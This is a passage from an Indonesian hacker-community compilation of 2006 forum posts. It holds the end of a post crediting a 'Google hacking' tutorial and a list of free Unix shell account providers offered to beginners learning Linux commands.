timestamp tahun 2006 . Tanggal dan bulan bisa juga digunakan asal kita tahu formatnya .

Sampai disini dulu tulisan ini aku buat moga temen2 tidak bingung lagi dalam mencari

file2 yang di inginkan

Terima kasih buat PeNcOpEt_CiNtA aka saleho yang telah ngasih tutorial tentang

"GOOGLE HACKING"

POM_PONK aka STIAWAN

Post by : POM_PONK on [ 24 April 2006 18:46:05 ]

Shell geratis POM_PONK aka SULISTYAWAN

Buat teman-teman yang baru dan pengen belajar menggunakan command linux

silahkan mendaftar di website penyedia shell geratis.

Berikut ini daftar websitenya:

Free.Net.Pl (Polish server) - http://www.free.net.pl/

Page 27: Solo Hacker Link 08

XOX.pl (Polish server) - http://www.xox.pl/

IProtection - http://www.iprotection.com/

CORONUS - http://www.coronus.com/

ODD.org - http://www.odd.org/

MARMOSET - http://www.marmoset.net/

flame.org - http://www.flame.org/

freeshells - http://freeshells.net.pk/

LinuxShell - http://www.linuxshell.org/

SDF (freeshell.org) - http://sdf.lonestar.org/

GREX (cyberspace.org) - http://www.grex.org/

NYX - http://www.nxy.net/

ShellYeah - http://www.shellyeah.org/

HOBBITON.org - http://www.hobbiton.org/

FreeShells - http://www.freeshells.net/

DucTape - http://www.ductape.net/

takiweb - http://www.takiweb.com/

FreePort - http://freeport.xenos.net/

FreedomShell.com - http://www.freedomshell.com/

LuxAdmin - http://www.luxadmin.org/

shellweb - http://shellweb.net/

blekko - http://blekko.net/

BSDSHELL - http://free.bsdshell.net/

ROOTshell.be - http://www.rootshell.be/

shellasylum.com - http://www.shellasylum.com/

Daforest - http://www.daforest.org/

yaa lumayan lah buat belajar hehehhehe

selamat mencoba dan belajar.....

POM_PONK

Page 28: Solo Hacker Link 08

Post by : POM_PONK on [ 15 April 2006 18:31:32 ]